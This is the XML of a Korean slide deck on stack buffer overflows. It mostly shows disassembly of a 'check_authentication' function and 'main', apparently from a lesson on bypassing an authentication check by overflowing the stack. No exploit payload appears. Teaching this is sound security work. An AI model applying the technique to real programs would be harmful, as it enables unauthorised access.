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75" r:id="rId3"/>
    <p:sldId id="273" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="277" r:id="rId6"/>
    <p:sldId id="276" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="280" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="279" r:id="rId12"/>
    <p:sldId id="281" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="282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9" r:id="rId35"/>
    <p:sldId id="31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43"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="130" d="100"/>
          <a:sy n="130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CA44-1078-F048-95A1-65A01C2DC93D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71C6B-BB2F-484F-AA6A-CA925CAB63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1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1C6B-BB2F-484F-AA6A-CA925CAB63A9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340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1C6B-BB2F-484F-AA6A-CA925CAB63A9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93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C2FCC-BA60-3040-ABA0-4C51F21EB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8754B6-F891-8841-B211-D8ECF1E96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01809-11A2-D143-9BD4-F6317D9D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82185-2045-5548-AB39-09831632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01960-DCBE-D948-9E19-AE12344D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881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C4A7B-124C-6647-8A7E-89B231D9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5784CB-6119-1641-B244-EEE8A1D41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7F242-D840-2D41-BDBB-F8A2935F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7C6EF-B190-5040-B59D-4F2372A2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E3723-B4E7-9E40-AD5F-8CACEC99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78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DB6731-0FB8-6A4E-82FC-D25C2B752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5DC4F3-7214-0545-A9EC-EA382755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FDDFC-30A3-5448-B9A5-0B038978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7F2A-F619-CF45-B534-397DF206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C5D46-0557-A543-A30E-D59A296D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35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D98-8DEE-6648-A219-1F6E9F2E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06A18-6246-4942-88A5-5CF9A89C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80AD6-DEDE-DE40-8724-EB9F9101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69A27-C743-7F48-ABC3-FDD525E1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6C216-056D-B640-84E8-8F90280D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6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F9ABE-5654-9A4E-9E90-F029C21B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1ABDE-019A-EE46-9D59-0DCEF3AB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4BB7C-D8D2-FA40-9792-A0AFA8E8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BCD15-1E0D-FB4D-BCDF-574B32A4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671B6-10E0-6541-96CD-4BE72F7A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063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E23F1-82BF-1F43-9203-D4A448B3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47FA1-5EC7-D54D-837D-C7157FAB2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32479B-0158-D746-9497-B4F6AB3E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93D0D-37DA-4947-8066-7638F394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E7270-C730-CC4B-A3B2-C3488022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B5359-E1DB-234B-B5E4-DE97EC58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36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CB892-CC11-8348-95CB-66C4F779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1A764-909F-5545-B3BD-B10C92C61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A4591-4096-C849-B841-FC8EF705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717B58-0C63-C549-97DC-E3EF195BB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01344F-EC50-DE40-A786-7C81EF948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DFD2D4-0EAC-F743-9393-2BC97A5B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351A2E-38C6-B24C-B16B-950DBA60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9EB206-1064-8649-96AB-3F8543C6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84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C8644-B8D6-BF48-AA41-D36D6595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D8AC58-5BB3-3F41-B53E-CDFA350A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6F64C6-67DE-E84E-87DC-8CEBA939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14FB54-4C17-E547-83E6-A4DE3B37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37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71DBFD-E7E1-9647-93FE-7A86FB67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98BDF1-6A81-2B45-A2AF-6B71525B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9B83C-603E-7A4A-ABCE-34E16ABD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42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1AFEC-6490-F54A-B2D8-8369C68C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06791-7689-F741-8D5E-B086496E0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FEF4DC-7627-1C4E-97B1-E9C587B32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4FBCA-EE1B-7446-BB18-3877970A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31F78-D581-5449-A97B-B61BE1E0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46B6F-20D2-C244-AF02-C9BA0782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10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4FAA5-3503-2F40-8D3D-5CD1C492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14078-3384-2E48-BD58-007E77493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619CA-67C4-DF4F-A2EE-0DFC6B798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7F7CDB-FED9-5245-BB1B-4AD17A52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DF597-7B1F-A440-9FEF-0C50B4AC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CA7C1-7BBA-4645-8C65-5E9792BF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E8EEF2-4B92-1D40-89D1-07A226C9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AD03D-C6F5-EC4E-B9C9-0AB80FDD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D495C-CB3E-2347-A94A-2B0F0A422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F7FD-5C65-6C4D-8D92-ACAEB1B3DF7C}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2019. 8. 14.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38B3A-6004-244C-8779-86FF81194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794AE-6F69-024C-AFEC-214184C2C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606B-7A23-5E49-8ADA-7B88D5A51F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565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3AB85-B64F-9C4C-B917-A9BCF4C74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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US"/>
              <a:t>오버플로우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041687-D3EF-9B49-AE4D-900EB696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68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36436-C17E-3346-B373-46B452BA7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7047186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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0x080484b1 &lt;+61&gt;:	lea    -0x1c(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484b4 &lt;+64&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx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0x080484b6 &lt;+66&gt;:	mov    $0x8048660,%eax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0x080484bb &lt;+71&gt;:	mov    $0x8,%ecx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0x080484c0 &lt;+76&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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0x080484c2 &lt;+78&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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0x080484c4 &lt;+80&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>repz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> %es:(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%ds:(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x080484c6 &lt;+82&gt;:	seta   %dl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0x080484c9 &lt;+85&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>setb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   %al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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US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0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81D7B-20FC-0C45-B40B-9B0B24C71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0x080484cc &lt;+88&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ecx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0x080484ce &lt;+90&gt;:	sub    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>al,%cl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0x080484d0 &lt;+92&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484d2 &lt;+94&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movsbl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> %al,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484d5 &lt;+97&gt;:	test   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484d7 &lt;+99&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 0x80484e0 												&lt;check_authentication+108&gt;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0x080484d9 &lt;+101&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,-0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x080484e0 &lt;+108&gt;:	lea    -0x1c(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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70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8287B-B182-3044-983E-3E6248DC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968359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ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>						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3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>						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3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>						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3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048506 &lt;+146&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 0x804850f 										&lt;check_authentication+155&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="3000" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2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3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048508 &lt;+148&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,-0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="3000" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2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3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x0804850f &lt;+155&gt;:	mov    -0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="3000" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2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3000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048512 &lt;+158&gt;:	add    $0x1c,%esp</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="30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5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C681-9FD1-C441-8349-37A64BBF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741EC-A83A-BD47-ACE7-0F5B8183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10000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="10000" dirty="0"/>
              <a:t>main </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="10000" dirty="0"/>
              <a:t>함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="10000" dirty="0" err="1"/>
              <a:t>부터</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="10000" dirty="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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70277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6" y="690509"/>
            <a:ext cx="8135006" cy="6467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500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> 0x08048519 &lt;+0&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2500" b="1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0x0804851a &lt;+1&gt;:	mov    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0x0804851c &lt;+3&gt;:	sub    $0x8,%esp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0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%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0x08048523 &lt;+10&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     0x8048547 &lt;main+46&gt;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  <a:endParaRPr lang="en-US" altLang="ko-KR" sz="30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onaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048547 &lt;+46&gt;:	mov    0xc(%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0x0804854a &lt;+49&gt;:	add    $0x4,%eax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0x0804854d &lt;+52&gt;:	mov    (%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0x0804854f &lt;+54&gt;:	mov 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,(%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0x08048552 &lt;+57&gt;:	call   0x8048474 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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0x08048557 &lt;+62&gt;:	test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ko-KR" altLang="ko-KR" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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7" y="565804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10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8135007" cy="6467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500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1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0x08048519 &lt;+0&gt;:	push   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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x0804851a &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2500" b="1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0x0804851c &lt;+3&gt;:	sub    $0x8,%esp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0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%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0x08048523 &lt;+10&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     0x8048547 &lt;main+46&gt;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  <a:endParaRPr lang="en-US" altLang="ko-KR" sz="30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onaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048547 &lt;+46&gt;:	mov    0xc(%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0x0804854a &lt;+49&gt;:	add    $0x4,%eax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0x0804854d &lt;+52&gt;:	mov    (%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0x0804854f &lt;+54&gt;:	mov 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,(%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0x08048552 &lt;+57&gt;:	call   0x8048474 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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0x08048557 &lt;+62&gt;:	test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ko-KR" altLang="ko-KR" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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7" y="565804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506607" y="5473379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86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7693570" cy="6467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500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1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0x08048519 &lt;+0&gt;:	push   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0x0804851a &lt;+1&gt;:	mov    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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x0804851c &lt;+3&gt;:	sub    $0x8,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2500" b="1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0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%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0x08048523 &lt;+10&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     0x8048547 &lt;main+46&gt;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  <a:endParaRPr lang="en-US" altLang="ko-KR" sz="30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onaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048547 &lt;+46&gt;:	mov    0xc(%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0x0804854a &lt;+49&gt;:	add    $0x4,%eax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0x0804854d &lt;+52&gt;:	mov    (%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0x0804854f &lt;+54&gt;:	mov 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,(%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0x08048552 &lt;+57&gt;:	call   0x8048474 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;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0x08048557 &lt;+62&gt;:	test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ko-KR" altLang="ko-KR" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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7" y="565804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506607" y="435892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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="486837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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="421881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88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7693570" cy="6467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500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
